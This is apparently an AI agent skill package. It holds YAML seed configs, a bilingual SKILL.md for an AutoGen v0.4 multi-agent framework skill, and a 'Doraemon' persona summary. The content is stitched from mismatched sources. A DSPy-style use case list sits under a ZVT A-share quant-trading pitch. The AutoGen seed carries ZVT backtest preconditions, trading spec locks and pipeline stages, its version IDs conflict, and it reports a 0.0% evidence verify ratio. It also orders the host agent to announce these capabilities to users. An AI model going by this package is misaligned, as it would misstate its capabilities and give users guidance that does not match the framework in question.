    name: finance-bp-137 / RAG with ChainOfThought
    version: v6.1
    intent_keywords:
    - RAG
    - retrieval
    - context
    - ChainOfThought
    entry_point: run_backtest
    fatal_guards:
    - SL-01
    - SL-02
    - SL-03
    - SL-04
    - SL-05
    - SL-06
    - SL-07
    - SL-08
    - SL-10
    - SL-11
    - SL-12
    spec_locks:
    - SL-01
    - SL-02
    - SL-03
    - SL-04
    - SL-05
    - SL-06
    - SL-07
    - SL-08
    - SL-09
    - SL-10
    - SL-11
    - SL-12
    preconditions:
    - PC-01
    - PC-02
    - PC-03
    - PC-04
post_install_notice:
  trigger: skill_installation_complete
  message_template:
    positioning: I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow.
    capability_catalog:
      group_strategy:
        source: auto_grouped
        strategy_reason: auto-grouped by UC.data_domain (2 distinct values, balanced distribution)
      groups:
      - group_id: mixed
        name: Mixed
        description: ''
        emoji: 📦
        uc_count: 7
        ucs:
        - uc_id: UC-001
          name: RAG with ChainOfThought
          short_description: Answer questions over a retrieval corpus with grounded reasoning, using ChainOfThought to expose
            intermediate reasoning before final answer
          sample_triggers:
          - RAG
          - retrieval
          - context
        - uc_id: UC-002
          name: Multi-Hop Search
          short_description: Answer multi-hop questions requiring chained retrievals (HotPotQA-style — composing facts across
            multiple Wikipedia passages)
          sample_triggers:
          - multi-hop
          - HotPotQA
          - iterative retrieval
        - uc_id: UC-003
          name: ReAct Agent (multi-tool)
          short_description: Agent that selects tools dynamically to answer open-ended questions; trajectory of thought→tool→observation
            steps
          sample_triggers:
          - ReAct
          - agent
          - tool calling
        - uc_id: UC-004
          name: Classification with Literal output (Banking77 etc)
          short_description: Multi-class text classification with stable class set defined as Literal[...] in the Signature
          sample_triggers:
          - classification
          - Literal
          - label
        - uc_id: UC-005
          name: Classification Finetuning (BootstrapFinetune)
          short_description: Distill a prompt-engineered program into a finetuned small model (cheaper inference at scale)
          sample_triggers:
          - finetune
          - BootstrapFinetune
          - distillation
        - uc_id: UC-006
          name: Math Reasoning with GEPA (AIME / GSM8K)
          short_description: Solve competition math via GEPA reflective prompt evolution
          sample_triggers:
          - math
          - AIME
          - GSM8K
        - uc_id: UC-007
          name: Privacy-Conscious Delegation (PAPILLON)
          short_description: Delegate sensitive queries to an external LM while preserving privacy; local LM redacts then
            remote LM answers
          sample_triggers:
          - privacy
          - PAPILLON
          - delegation
      - group_id: market_data
        name: Market Data
        description: ''
        emoji: 📊
        uc_count: 1
        ucs:
        - uc_id: UC-008
          name: Yahoo Finance ReAct Agent
          short_description: Build an agent that fetches market data + news to provide investment insights — the only explicitly
            finance-tagged tutorial in the dspy docs tree
          sample_triggers:
          - finance
          - stock
          - Yahoo
    call_to_action: Tell me which one you want to try.
    featured_entries:
    - uc_id: UC-001
      beginner_prompt: Try rag with chainofthought
      auto_selected: true
    - uc_id: UC-002
      beginner_prompt: Try multi-hop search
      auto_selected: true
    - uc_id: UC-003
      beginner_prompt: Try react agent (multi-tool)
      auto_selected: true
    more_info_hint: Ask me 'what else can you do?' to see all 8 capabilities.
  locale_rendering:
    instruction: On skill_installation_complete, translate ALL user-facing strings (positioning + capability_catalog.groups[].name
      + capability_catalog.groups[].description + capability_catalog.groups[].ucs[].short_description + call_to_action + featured_entries[].beginner_prompt
      + more_info_hint) into detected user locale per locale_contract. Preserve UC-IDs, group_id, emoji, and sample_triggers
      verbatim.
    preserve_verbatim:
    - UC-IDs
    - group_id
    - emoji
    - sample_triggers
    - technical_class_names
  enforcement:
    action: 'Host agent MUST send composed message to user as the FIRST user-facing response after skill_installation_complete
      event. Message MUST contain: positioning, capability_catalog (rendered as markdown tables per group), 3 featured_entries,
      call_to_action, and more_info_hint.'
    violation_code: PIN-01
    violation_signal: First user-facing message post-install does not contain the full capability_catalog (all UCs grouped)
      OR skips featured_entries OR skips call_to_action.
human_summary:
  persona: Doraemon
  what_i_can_do:
    tagline: 'I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me
      what you want; I''ll write the code, you don''t have to dig docs. (Heads up: ZVT natively supports A-share, HK, and
      crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don''t bother for serious work.)'
    use_cases:
    - ReAct Agent (multi-tool)
    - Multi-Hop Search
    - RAG with ChainOfThought
    - A-share MACD daily golden-cross backtest with hfq price adjustment from eastmoney
    - 'End-to-end ZVT pipeline: FinanceRecorder + GoodCompanyFactor + StockTrader'
    - Multi-factor strategy with TargetSelector (AND mode) combining MACD + volume breakout
    - Index composition data collection (SZ1000, SZ2000) with EM recorder
  what_i_auto_fetch:
  - ZVT stage pipeline structure (data_collection → visualization) from LATEST.yaml
  - Semantic locks (SL-01 through SL-12) — especially sell-before-buy ordering and MACD params
  - Fatal constraints (finance-C-*) relevant to your target strategy type
  - 'Default parameters: MACD(12,26,9), hfq adjustment, buy_cost=0.001, base_capital=1M CNY'
  - Entity ID format (stock_sh_600000) and DataFrame MultiIndex convention
  - Provider-specific recorder class names and required class attributes
  what_i_ask_you:
  - 'Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage
    is thin)'
  - 'Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare,
    or qmt (broker)?'
  - 'Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?'
  - 'Time range: start_timestamp and end_timestamp for backtest period'
  - 'Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?'
  locale_rendering:
    instruction: On first user contact, translate all fields above into detected user locale while preserving Doraemon persona
      (direct, frank, mildly snarky, knows limits).
    preserve_verbatim:
    - BD-IDs
    - SL-IDs
    - UC-IDs
    - finance-C-IDs
    - class_names
    - function_names
    - file_paths
    - numeric_thresholds

ClawHub Coding Data Analysis+2

T@clawhub-tangweigang-jpg-8679fec286

Autogen Multi Agent

Skill

AutoGen v0.4：asyncio actor-runtime 多智能体框架（autogen-core / autogen-agentchat / autogen-ext 三包）。 AutoGen v0.4: asyncio actor-runtime multi-agent framework (auto...

---
name: autogen-multi-agent
description: |-
  AutoGen v0.4：asyncio actor-runtime 多智能体框架（autogen-core / autogen-agentchat / autogen-ext 三包）。
  AutoGen v0.4: asyncio actor-runtime multi-agent framework (autogen-core / autogen-agentchat / autogen-ext). ⚠️ Microsoft has declared maintenance mode; new projects should use Microsoft Agent Framework (MAF). This skill is for legacy maintenance only.
license: MIT-0
compatibility: AI engineering knowledge skill — host AI consumes seed.yaml directly. No installation required.
metadata:
  version: "v0.1.0"
  blueprint_id: "finance-bp-136"
  blueprint_source: "microsoft/autogen"
  blueprint_commit: "027ecf0a379bcc1d09956d46d12d44a3ad9cee14"
  category: ai-engineering
  doramagic_url: "https://doramagic.ai/zh/crystal/autogen-multi-agent"
  openclaw:
    skillKey: autogen-multi-agent
    category: ai-engineering
    primaryEnv: knowledge
---
# 这个 skill 适合什么用户？能做哪些任务？

## 概览

⚠️ **重要提示**：AutoGen v0.4 已进入微软官方维护模式（README:14,21,23），新项目应使用 Microsoft Agent Framework（MAF）。本 skill 仅服务于既有 AutoGen 工程的维护、迁移与排错。

AutoGen 是 asyncio actor-runtime 多智能体框架（github.com/microsoft/autogen）。三个 Python 包：autogen-core（runtime + 基础接口）、autogen-agentchat（高层 AssistantAgent / GroupChat API）、autogen-...

**Doramagic 晶体页**: https://doramagic.ai/zh/crystal/autogen-multi-agent

## 知识规模

- **51 条约束** (2 fatal + 49 non-fatal)
- 上游源码: `microsoft/autogen` @ commit `027ecf0a`
- 蓝图 ID: `finance-bp-136`

## 用法

Host AI（Claude Code / Cursor / OpenClaw）读 `references/seed.yaml`，按其中的：
- `intent_router` 匹配用户意图
- `architecture` 理解项目架构
- `constraints` 应用 anti-pattern 约束
- `business_decisions` 参考核心设计决策

## FAQ 摘要

### 这个 skill 适合什么用户？能做哪些任务？
主要适合既有 AutoGen 工程的维护团队：排错、迁移到 MAF、向后兼容性补丁。新项目不建议从 AutoGen 起步——用 Microsoft Agent Framework（MAF）。如确需 AutoGen 范式，本 skill 覆盖 actor runtime / GroupChat / Magentic-One 等典型用例。

### 需要准备什么环境？依赖什么？
Python 3.10+（按包元数据），至少一个 ChatCompletionClient provider（共 9 个：openai / anthropic / azure_openai / azure_ai / ollama / llama_cpp / semantic_kernel / cached / replay；OpenAI 是事实标准）。

### 会踩哪些坑？这个 skill 怎么防护？
本 skill 内置 51 条约束（2 条 fatal）。CRITICAL 安全坑：(1) LocalCommandLineCodeExecutor 文档声称的 regex 命令消毒**并不存在**——所有 LLM 生成的命令直接 shell 执行到 host；(2) pyautogen 包现已是 0 字节代理，v0.2 cookbook 代码会三处失败；

---

完整文档: 见 `references/seed.yaml` (v6.1 schema). 浏览页: https://doramagic.ai/zh/crystal/autogen-multi-agent

FILE:human_summary.md
# finance-bp-136-v6.1 — Human Summary

**Persona**: Doraemon

> I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me what you want; I'll write the code, you don't have to dig docs. (Heads up: ZVT natively supports A-share, HK, and crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don't bother for serious work.)

## What I Can Do

- Multi-agent travel planner with handoffs (Swarm)
- Tool-augmented assistant with MCP server
- Two-agent code-writer + code-executor pair (Chess game)
- A-share MACD daily golden-cross backtest with hfq price adjustment from eastmoney
- End-to-end ZVT pipeline: FinanceRecorder + GoodCompanyFactor + StockTrader
- Multi-factor strategy with TargetSelector (AND mode) combining MACD + volume breakout
- Index composition data collection (SZ1000, SZ2000) with EM recorder

## What I Auto-Fetch

- ZVT stage pipeline structure (data_collection → visualization) from LATEST.yaml
- Semantic locks (SL-01 through SL-12) — especially sell-before-buy ordering and MACD params
- Fatal constraints (finance-C-*) relevant to your target strategy type
- Default parameters: MACD(12,26,9), hfq adjustment, buy_cost=0.001, base_capital=1M CNY
- Entity ID format (stock_sh_600000) and DataFrame MultiIndex convention
- Provider-specific recorder class names and required class attributes

## What I Ask You

- Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage is thin)
- Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare, or qmt (broker)?
- Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?
- Time range: start_timestamp and end_timestamp for backtest period
- Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?

## Locale Rendering

**Instruction**: On first user contact, translate all fields above into detected user locale while preserving Doraemon persona (direct, frank, mildly snarky, knows limits).

**Preserve verbatim**: BD-IDs, SL-IDs, UC-IDs, finance-C-IDs, class_names, function_names, file_paths, numeric_thresholds

---

*Generated by compile_crystal_skeleton.py v5.0 for finance-bp-136-v6.1*
*All content is English source — agent translates on first user contact.*
FILE:references/seed.yaml
meta:
  id: finance-bp-136-v6.1
  version: v6.1
  blueprint_id: finance-bp-136
  sop_version: crystal-compilation-v6.1
  source_language: en
  compiled_at: '2026-04-25T09:07:14.728690+00:00'
  target_host: openclaw
  authoritative_artifact:
    primary: seed.yaml
    non_authoritative_derivatives:
    - SKILL.md (host-generated summary, may lag)
    - HEARTBEAT.md (host telemetry)
    - memory/*.md (host conversational memory)
    rule: On any behavioral decision (preconditions check, OV assertion, EQ rule firing, spec_lock verification), agents MUST
      re-read seed.yaml. Derivatives are for UI display only and may be out-of-date.
  execution_protocol:
    install_trigger:
    - Execute resources.host_adapter.install_recipes[] in declared order
    - Verify each package with import check before proceeding
    execute_trigger: When user intent matches intent_router.uc_entries[].positive_terms AND user uses action verb (run/execute/跑/执行/backtest/fetch/collect)
    on_execute:
    - Reload seed.yaml (do not rely on SKILL.md or cached summaries)
    - Run preconditions[] in declared order; halt on first fatal failure with on_fail message to user
    - Enter context_state_machine.CA1_MEMORY_CHECKED state
    - Evaluate evidence_quality.enforcement_rules[]; prepend user_disclosure_template
    - Translate user_facing_fields to user locale per locale_contract
    workspace_resolution:
      scripts_path: '{host_workspace}/scripts/'
      skills_path: '{host_workspace}/skills/'
      trace_path: '{host_workspace}/.trace/'
locale_contract:
  source_language: en
  user_facing_fields:
  - human_summary.what_i_can_do.tagline
  - human_summary.what_i_can_do.use_cases[]
  - human_summary.what_i_auto_fetch[]
  - human_summary.what_i_ask_you[]
  - evidence_quality.user_disclosure_template
  - post_install_notice.message_template.positioning
  - post_install_notice.message_template.capability_catalog.groups[].name
  - post_install_notice.message_template.capability_catalog.groups[].description
  - post_install_notice.message_template.capability_catalog.groups[].ucs[].name
  - post_install_notice.message_template.capability_catalog.groups[].ucs[].short_description
  - post_install_notice.message_template.call_to_action
  - post_install_notice.message_template.featured_entries[].beginner_prompt
  - post_install_notice.message_template.more_info_hint
  - preconditions[].description
  - preconditions[].on_fail
  - intent_router.uc_entries[].name
  - intent_router.uc_entries[].ambiguity_question
  - architecture.pipeline
  - architecture.stages[].narrative.does_what
  - architecture.stages[].narrative.key_decisions
  - architecture.stages[].narrative.common_pitfalls
  - constraints.fatal[].consequence
  - constraints.regular[].consequence
  - output_validator.assertions[].failure_message
  - acceptance.hard_gates[].on_fail
  - skill_crystallization.action
  locale_detection_order:
  - explicit_user_declaration
  - first_message_language
  - system_locale
  translation_enforcement:
    trigger: on_first_user_message
    action: Render user_facing_fields in detected locale, preserving all IDs (BD-/SL-/UC-/finance-C-) and code identifiers
      verbatim
    violation_code: LOCALE-01
    violation_signal: User receives untranslated English Human Summary when detected locale != en
evidence_quality:
  declared:
    evidence_coverage_ratio: null
    evidence_verify_ratio: null
    evidence_invalid: 0
    evidence_verified: null
    evidence_auto_fixed: null
    audit_coverage: '20 finance-universal not_applicable + 6 AIL warn/fail/n.a. + 5 DAT pass/warn/fail/n.a. = 31 items reviewed
      across applicable scope

      '
    audit_pass_rate: 1/10 (10% applicable items pass; 9 warn/fail/missing capture the architectural boundaries and divergences
      worth surfacing as constraints)
    audit_fail_total: 0
    audit_finance_universal:
      pass: 0
      warn: 0
      fail: 0
    audit_subdomain_totals:
      pass: 0
      warn: 0
      fail: 0
  enforcement_rules:
  - id: EQ-01
    trigger: declared.evidence_verify_ratio < 0.5
    action: MUST invoke traceback lookup for all cited BD-IDs in output before emitting business code — read LATEST.yaml sections
      for each BD referenced
    violation_code: EQ-01-V
    violation_signal: Generated script references BD-IDs but no tool_call to read LATEST.yaml preceded code generation
  - id: EQ-02
    trigger: always
    action: MUST prepend user_disclosure_template (translated to user locale) to first user-facing response
    violation_code: EQ-02-V
    violation_signal: First agent response to user does not contain audit warning phrase
  user_disclosure_template: '[QUALITY NOTICE] This crystal was compiled from blueprint finance-bp-136. Evidence verify ratio
    = 0.0% and audit fail total = 0. Generated results may have uncaptured requirement gaps. Verify critical decisions against
    source files (LATEST.yaml / LATEST.jsonl).'
traceback:
  source_files:
    blueprint: LATEST.yaml
    constraints: LATEST.jsonl
  mandatory_lookup_scenarios:
  - id: TB-01
    condition: Two constraints have apparently conflicting enforcement rules
    lookup_target: LATEST.jsonl — find both constraint IDs, compare `consequence` + `evidence_refs` to determine priority
  - id: TB-02
    condition: A business decision rationale is unclear or disputed
    lookup_target: LATEST.yaml — locate BD-ID under business_decisions, read `rationale` + `alternative_considered` fields
  - id: TB-03
    condition: evidence_invalid > 0 in evidence_quality.declared
    lookup_target: LATEST.yaml _enrich_meta — cross-check specific BD `evidence_refs` fields for invalid markers
  - id: TB-04
    condition: User asks where a rule comes from
    lookup_target: LATEST.jsonl — find constraint by ID, read `confidence.evidence_refs` for source file + line number
  - id: TB-05
    condition: Generated code does not match expected ZVT API behavior
    lookup_target: LATEST.yaml stages[].required_methods — verify method signature and evidence locator in source code
  degraded_lookup:
    no_fs_access: 'Ask the user to paste the relevant LATEST.yaml section or LATEST.jsonl lines for the BD-/finance-C- IDs
      in question. Crystal ID: finance-bp-136-v5.0.'
trace_schema:
  event_types:
  - precondition_check
  - spec_lock_check
  - evidence_rule_fired
  - evidence_rule_skipped
  - locale_translation_emitted
  - hard_gate_passed
  - hard_gate_failed
  - skill_emitted
  - false_completion_claim
preconditions:
- id: PC-01
  description: zvt package installed and importable
  check_command: python3 -c 'import zvt; print(zvt.__version__)'
  on_fail: 'Run: python3 -m pip install zvt  then re-run: python3 -m zvt.init_dirs to initialize data directories'
  severity: fatal
- id: PC-02
  description: K-data exists for target entities (required before backtesting)
  check_command: python3 -c "from zvt.api.kdata import get_kdata; df = get_kdata(entity_ids=['stock_sh_600000'], limit=1);
    assert df is not None and len(df) > 0, 'No kdata found'"
  on_fail: 'Run recorder first: python3 -m zvt.recorders.em.em_stock_kdata_recorder --entity_ids stock_sh_600000  (replace
    with your target entity IDs)'
  severity: fatal
  applies_to_uc: []
- id: PC-03
  description: ZVT data directory initialized (~/.zvt or ZVT_HOME)
  check_command: 'python3 -c "import os; from pathlib import Path; zvt_home = Path(os.environ.get(''ZVT_HOME'', Path.home()
    / ''.zvt'')); assert zvt_home.exists(), f''ZVT home not found: {zvt_home}''"'
  on_fail: 'Run: python3 -m zvt.init_dirs'
  severity: fatal
- id: PC-04
  description: SQLite write permission for ZVT data directory
  check_command: python3 -c "import os, tempfile; from pathlib import Path; zvt_home = Path(os.environ.get('ZVT_HOME', Path.home()
    / '.zvt')); test_f = zvt_home / '.write_test'; test_f.touch(); test_f.unlink()"
  on_fail: 'Check directory permissions: chmod u+w ~/.zvt  or set ZVT_HOME environment variable to a writable location'
  severity: warn
intent_router:
  uc_entries:
  - uc_id: UC-001
    name: Two-agent code-writer + code-executor pair (Chess game)
    positive_terms:
    - chess
    - game
    - two-agent
    - rule-checker
    - RoundRobin
    data_domain: technical_demo
    negative_terms:
    - dynamic role-routing
    - production untrusted-code paths without approval_func
  - uc_id: UC-002
    name: Tool-augmented assistant with MCP server
    positive_terms:
    - MCP
    - tool-use
    - web-browsing
    - playwright
    - workbench
    data_domain: technical_demo
    negative_terms:
    - air-gapped
    - workloads mixing tools=[] with workbench= (raises ValueError)
  - uc_id: UC-003
    name: Multi-agent travel planner with handoffs (Swarm)
    positive_terms:
    - swarm
    - handoff
    - multi-agent-routing
    - travel-planner
    data_domain: technical_demo
    negative_terms:
    - participants that don't emit HandoffMessage (constructor raises)
    - workloads needing autonomous routing without explicit handoff
  - uc_id: UC-004
    name: Magentic-One ledger-orchestrated team
    positive_terms:
    - magentic-one
    - ledger
    - plan
    - autonomous-orchestration
    - stall-detection
    data_domain: technical_demo
    negative_terms:
    - low-latency / simple flows
    - tasks not benefiting from explicit planning
  - uc_id: UC-005
    name: GraphRAG-augmented assistant
    positive_terms:
    - GraphRAG
    - RAG
    - graph-search
    - knowledge-graph
    data_domain: technical_demo
    negative_terms:
    - users expecting a first-class RAGAgent class (does not exist in v0.4)
  - uc_id: UC-006
    name: FastAPI-hosted agent with HTTP UI
    positive_terms:
    - web-API
    - FastAPI
    - streaming
    - UI
    - EventSource
    - WebSocket
    data_domain: technical_demo
    negative_terms:
    - workloads sharing a single team across concurrent requests (run_stream re-entry guard raises)
  - uc_id: UC-007
    name: Distributed agents over gRPC
    positive_terms:
    - distributed
    - gRPC
    - worker
    - multi-process
    - WorkerAgentRuntime
    data_domain: technical_demo
    negative_terms:
    - simple in-process flows
    - environments without gRPC tooling
  - uc_id: UC-008
    name: Cross-language agents (Python ↔ .NET)
    positive_terms:
    - cross-language
    - .NET
    - polyglot
    - protobuf
    - gRPC
    data_domain: technical_demo
    negative_terms:
    - Python-only or .NET-only stacks
  - uc_id: UC-009
    name: Code-executor agent with LLM-based approval gate
    positive_terms:
    - code-execution
    - approval-gate
    - LLM-as-judge
    - safety
    data_domain: technical_demo
    negative_terms:
    - workloads where an extra LLM call per code execution is too expensive / slow
    - environments needing zero-LLM-overhead execution (use static allowlist instead)
  - uc_id: UC-010
    name: Selector-based routing for multi-skill team
    positive_terms:
    - selector
    - role-routing
    - multi-skill
    - specialist-team
    data_domain: technical_demo
    negative_terms:
    - high-stakes routing without explicit selector_func (silent fallback per BD-010 / pitfall-002)
  - uc_id: UC-011
    name: Custom selector function (state-machine routing)
    positive_terms:
    - state-machine
    - deterministic-routing
    - selector_func
    - custom-routing
    data_domain: technical_demo
    negative_terms:
    - dynamic LLM-driven routing
  - uc_id: UC-012
    name: Human-in-the-loop with UserProxyAgent + HandoffTermination
    positive_terms:
    - human-in-the-loop
    - HITL
    - user-proxy
    - handoff-termination
    - resume
    data_domain: technical_demo
    negative_terms:
    - autonomous-only loops
    - flows requiring real-time chat (HandoffTermination is a discrete pause)
context_state_machine:
  states:
  - id: CA1_MEMORY_CHECKED
    entry: Task started
    exit: All memory queries attempted and recorded; memory_unavailable set if failed
    timeout: 30s — skip memory, mark memory_unavailable=true, proceed to CA2
  - id: CA2_GAPS_FILLED
    entry: CA1 complete
    exit: 'All FATAL-priority required inputs answered: target market (A-share/HK/US), data source, time range, strategy type'
    timeout: NOT skippable — FATAL inputs MUST be user-answered before proceeding
  - id: CA3_PATH_SELECTED
    entry: CA2 complete
    exit: intent_router matched single use case with confidence gap > 20% over next candidate, no data_domain ambiguity
    timeout: Trigger ambiguity_question for top-2 candidates, await user selection
  - id: CA4_EXECUTING
    entry: CA3 complete + user explicit confirmation received
    exit: All hard gates G1-Gn passed and output files written
    timeout: NOT skippable — user confirmation of execution path required
  enforcement: Code generation is PROHIBITED before CA4_EXECUTING. Any regression to earlier state MUST be announced to user.
    buy/sell ordering SL-01 check runs at CA4 entry.
spec_lock_registry:
  semantic_locks:
  - id: SL-01
    description: Execute sell orders before buy orders in every trading cycle
    locked_value: sell() called before buy() in each Trader.run() iteration
    violation_is: fatal
    source_bd_ids:
    - BD-018
  - id: SL-02
    description: Trading signals MUST use next-bar execution (no look-ahead)
    locked_value: due_timestamp = happen_timestamp + level.to_second()
    violation_is: fatal
    source_bd_ids:
    - BD-014
    - BD-025
  - id: SL-03
    description: Entity IDs MUST follow format entity_type_exchange_code
    locked_value: stock_sh_600000 | stockhk_hk_0700 | stockus_nasdaq_AAPL
    violation_is: fatal
    source_bd_ids: []
  - id: SL-04
    description: DataFrame index MUST be MultiIndex (entity_id, timestamp)
    locked_value: df.index.names == ['entity_id', 'timestamp']
    violation_is: fatal
    source_bd_ids: []
  - id: SL-05
    description: 'TradingSignal MUST have EXACTLY ONE of: position_pct, order_money, order_amount'
    locked_value: XOR enforcement in trading/__init__.py:68
    violation_is: fatal
    source_bd_ids: []
  - id: SL-06
    description: 'filter_result column semantics: True=BUY, False=SELL, None/NaN=NO ACTION'
    locked_value: factor.py:475 order_type_flag mapping
    violation_is: fatal
    source_bd_ids: []
  - id: SL-07
    description: Transformer MUST run BEFORE Accumulator in factor pipeline
    locked_value: 'compute_result(): transform at :403 before accumulator at :409'
    violation_is: fatal
    source_bd_ids: []
  - id: SL-08
    description: 'MACD parameters locked: fast=12, slow=26, signal=9'
    locked_value: factors/algorithm.py:30 macd(slow=26, fast=12, n=9)
    violation_is: fatal
    source_bd_ids:
    - BD-036
  - id: SL-09
    description: 'Default transaction costs: buy_cost=0.001, sell_cost=0.001, slippage=0.001'
    locked_value: sim_account.py:25 SimAccountService default costs
    violation_is: warning
    source_bd_ids:
    - BD-029
  - id: SL-10
    description: A-share equity trading is T+1 (no same-day close of buy positions)
    locked_value: sim_account.available_long filters by trading_t
    violation_is: fatal
    source_bd_ids: []
  - id: SL-11
    description: Recorder subclass MUST define provider AND data_schema class attributes
    locked_value: contract/recorder.py:71 Meta; register_schema decorator
    violation_is: fatal
    source_bd_ids: []
  - id: SL-12
    description: Factor result_df MUST contain either 'filter_result' OR 'score_result' column
    locked_value: result_df.columns.intersection({'filter_result', 'score_result'}) non-empty
    violation_is: fatal
    source_bd_ids: []
  implementation_hints:
  - id: IH-01
    hint: 'Use AdjustType enum exactly: qfq (pre-adjust), hfq (post-adjust), bfq (none) — contract/__init__.py:121'
  - id: IH-02
    hint: For A-share kdata, default to hfq for long-term analysis (dividend-adjusted) — trader.py:538 StockTrader
  - id: IH-03
    hint: SQLite connection MUST use check_same_thread=False for multi-threaded recorders
  - id: IH-04
    hint: Accumulator state serialization uses JSON with custom encoder/decoder hooks — contract/base_service.py
  - id: IH-05
    hint: Factor.level MUST match TargetSelector.level (enforced at add_factor) — factors/target_selector.py:84
preservation_manifest:
  required_objects:
    business_decisions_count: 30
    fatal_constraints_count: 2
    non_fatal_constraints_count: 49
    use_cases_count: 12
    semantic_locks_count: 12
    preconditions_count: 4
    evidence_quality_rules_count: 2
    traceback_scenarios_count: 5
architecture:
  pipeline: data_collection -> data_storage -> factor_computation -> target_selection -> trading_execution -> visualization
  stages:
  - id: data_collection
    narrative:
      does_what: TimeSeriesDataRecorder and FixedCycleDataRecorder fetch OHLCV and fundamental data from providers (eastmoney,
        joinquant, baostock, akshare) and persist domain objects (Stock1dKdata, BalanceSheet) to SQLite via df_to_db().
      key_decisions: BD-002 chose evaluate_start_end_size_timestamps for incremental fetch (not full refresh) because comparing
        to get_latest_saved_record avoids redundant API calls; BD-003 chose get_data_map field transformation to keep domain
        schema provider-agnostic.
      common_pitfalls: 'Don''t forget SL-11: Recorder subclass MUST declare both provider and data_schema class attributes
        else initialization fails with assertion error; finance-C-001 fatal violation.'
    business_decisions: []
  - id: data_storage
    narrative:
      does_what: StorageBackend persists DataFrames to per-provider SQLite databases at {data_path}/{provider}/{provider}_{db_name}.db
        using path templates from _get_path_template; Mixin.record_data and Mixin.query_data provide uniform read/write interface.
      key_decisions: BD-004 chose StorageBackend abstraction (not hardcoded SQLite) to allow future cloud storage swap; BD-006
        derives db_name from data_schema __tablename__ for per-domain database isolation.
      common_pitfalls: SL-04 violation (wrong DataFrame index) causes factor pipeline failures downstream; always ensure df.index.names
        == ['entity_id', 'timestamp'] before calling record_data.
    business_decisions: []
  - id: factor_computation
    narrative:
      does_what: Factor.compute() applies Transformer (stateless, e.g. MacdTransformer) then Accumulator (stateful, e.g. MaStatsAccumulator)
        to produce filter_result or score_result columns; EntityStateService persists per-entity rolling state across batches.
      key_decisions: BD-007 chose Factor inheriting DataReader for composable data access; SL-08 locks MACD at (fast=12, slow=26,
        n=9) — chose standard Appel parameters not adaptive because interpretability matters for practitioners.
      common_pitfalls: 'SL-07: Transformer MUST run before Accumulator — swapping order causes NaN propagation; SL-12: result_df
        must contain filter_result OR score_result column or TargetSelector silently drops all signals.'
    business_decisions: []
  - id: target_selection
    narrative:
      does_what: TargetSelector.add_factor() registers Factor instances; get_targets() returns entity_ids passing threshold
        filter at a specific timestamp, enabling point-in-time historical backtesting without look-ahead.
      key_decisions: BD-012 chose registrable factor list (not hardcoded) for runtime customization; BD-013 chose timestamp-specific
        filtering not current-only because backtests need historical point-in-time correctness.
      common_pitfalls: Factor.level MUST match TargetSelector.level (IH-05); mismatched levels cause silent empty target lists
        that look like no signals but are actually level-mismatch bugs.
    business_decisions: []
  - id: trading_execution
    narrative:
      does_what: Trader.run() calls sell() before buy() each cycle, generates TradingSignals with due_timestamp = happen_timestamp
        + level.to_second() for next-bar execution, and applies on_profit_control() for stop-loss/take-profit before regular
        target selection.
      key_decisions: SL-01 locks sell-before-buy order because available_long check in sim_account depends on it — chose this
        over symmetric ordering to prevent implicit leverage; BD-039 chose long=AND/short=OR multi-level logic to reflect
        risk asymmetry.
      common_pitfalls: 'SL-02 violation (immediate execution instead of next-bar) introduces look-ahead bias and makes backtest
        results unreproducible in live trading; SL-10: A-share T+1 constraint — backtesting without it overstates returns.'
    business_decisions: []
  - id: visualization
    narrative:
      does_what: Drawer.draw() combines kline main chart with factor overlays and Rect annotations for entry/exit signals
        using Plotly; Drawable interface on Factor enables consistent chart rendering across data types.
      key_decisions: BD-019 chose drawer_rects subclass override for custom annotations not hardcoded markers — allows traders
        to define entry/exit visuals without modifying base drawing logic.
      common_pitfalls: draw_result=True by default (BD-055) is fine for development but set draw_result=False in production/headless
        environments to avoid Plotly server startup overhead.
    business_decisions: []
  - id: cross_cutting_concerns
    narrative:
      does_what: 'Invariants and utilities that span multiple pipeline stages — collected from 7 source groups: agent_message_dispatch(6),
        chatagent_init(10), code_execution(3), cross_cutting(5), groupchat_construct(2), speaker_selection(3), and 1 more.'
      key_decisions: 30 BDs merged here because they apply to more than one main stage (e.g. algorithm helpers, default value
        choices, ordering contracts, error handling). Agent should inspect individual BD summaries and link back to affected
        main stages via shared IDs.
      common_pitfalls: Cross-cutting concerns frequently surface as bugs when changes to one main stage unintentionally break
        another. Check constraints referencing these BDs and verify invariants still hold after any stage-local modification.
    business_decisions:
    - id: BD-001
      type: B
      summary: Async event-driven actor runtime as v0.4 foundation
    - id: BD-004
      type: B/BA
      summary: max_tool_iterations default = 1
    - id: BD-005
      type: B/BA
      summary: reflect_on_tool_use default = False; FORCED True when output_content_type is set
    - id: BD-009
      type: B
      summary: Concurrent tool execution via asyncio.gather (unconditional)
    - id: BD-011
      type: B
      summary: ignore_unhandled_exceptions default = True (runtime); BaseGroupChat overrides to False
    - id: BD-015
      type: B
      summary: SelectSpeakerEvent / handoff dispatched via topic-based pub/sub, not direct send
    - id: BD-002
      type: B/BA
      summary: Caller contract — pass NEW messages only, not full history
    - id: BD-003
      type: B
      summary: One ChatCompletionClient instance = one model
    - id: BD-016
      type: B
      summary: StructuredMessage[T] requires MessageFactory registration (auto-done by BaseGroupChat)
    - id: BD-051
      type: B
      summary: pyautogen PyPI package is now a 4-file proxy (0-byte __init__.py) pulling autogen-agentchat>=0.6.4
    - id: BD-052
      type: B
      summary: 'ConversableAgent / v0.2 GroupChat / register_reply: REMOVED from main, only on `git refs/heads/0.2`'
    - id: BD-053
      type: T
      summary: '`ModelCapabilities` TypedDict marked @deprecated, replaced by `ModelInfo`'
    - id: BD-054
      type: T
      summary: '`ChatCompletionClient.capabilities` property is @abstractmethod but emits warning'
    - id: BD-057
      type: B
      summary: Teachable Agent — v0.2 feature, MISSING in v0.4
